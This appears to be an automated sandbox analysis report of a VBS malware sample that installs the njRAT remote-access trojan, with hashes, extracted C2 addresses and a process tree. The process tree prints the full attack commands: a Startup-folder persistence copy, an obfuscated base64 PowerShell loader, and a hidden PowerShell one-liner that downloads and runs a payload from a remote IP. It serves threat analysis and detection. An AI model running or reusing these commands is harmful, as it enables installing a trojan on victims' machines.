Analysis
-
max time kernel
146s -
max time network
139s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
21-12-2021 18:54
Static task
static1
Behavioral task
behavioral1
Sample
9fb660eca8d9ed1038a8cffc032e59bb.vbs
Resource
win7-en-20211208
General
-
Target
9fb660eca8d9ed1038a8cffc032e59bb.vbs
-
Size
151KB
-
MD5
9fb660eca8d9ed1038a8cffc032e59bb
-
SHA1
4aff5b55b1b499cec665f46b132856a4a300b4e9
-
SHA256
2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108
-
SHA512
0bcb0de54a3bdbe9d0e2be1899ab05060a7db58ae6e53aeed82a54b99f126502e0366415e590f22909aa9531c272af8287c6d5f06ece31de21156bcc2ef81790
Malware Config
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted
njrat
0.7NC
NYAN CAT
revg.duckdns.org:57831
ebef4abe57d24e8
-
reg_key
ebef4abe57d24e8
-
splitter
@!#&^%$
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 14 3964 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3964 set thread context of 2976 3964 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe 3964 powershell.exe 3964 powershell.exe 3964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 812 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe Token: 33 2976 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2976 RegSvcs.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.execmd.exepowershell.exepowershell.exedescription pid process target process PID 2668 wrote to memory of 3812 2668 WScript.exe cmd.exe PID 2668 wrote to memory of 3812 2668 WScript.exe cmd.exe PID 3812 wrote to memory of 3888 3812 cmd.exe PING.EXE PID 3812 wrote to memory of 3888 3812 cmd.exe PING.EXE PID 3812 wrote to memory of 2684 3812 cmd.exe powershell.exe PID 3812 wrote to memory of 2684 3812 cmd.exe powershell.exe PID 2668 wrote to memory of 812 2668 WScript.exe powershell.exe PID 2668 wrote to memory of 812 2668 WScript.exe powershell.exe PID 812 wrote to memory of 3964 812 powershell.exe powershell.exe PID 812 wrote to memory of 3964 812 powershell.exe powershell.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe PID 3964 wrote to memory of 2976 3964 powershell.exe RegSvcs.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')2⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
PID:3888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
MD5
4bcca567d023ce5661552f85274025e3
SHA11dc0aacc4a8f4e0c4f850c4bc25c73e5c55a1cc0
SHA256e31b1409244d5e2274352f28d6bae42a5cb54a33888ad76fda5563b19adf3400
SHA5128bbb54db28137e99de8f62b111dc09af94324f1cea2870d89db3865166fa331b9b4a5fbd07f8a1c903b87009220453c8c012971302cd0e988b2f35ca87141ca9
-
MD5
abb924100aadf485792f810c186ab581
SHA13daf1a77e1c1114f56652616c3ec238921d15383
SHA2564f4649d70b4881808403dc9c09d62f524a853e9cd367b2adf3baf9964fbdd613
SHA5123ec1b32d738062461c1c788fa6db83bd0943c440e6a126ca98dc3f52cfcc032597fd502195ea18c8e70e42adea0d11c29240c7aeb84703630fe333cc9e8a0310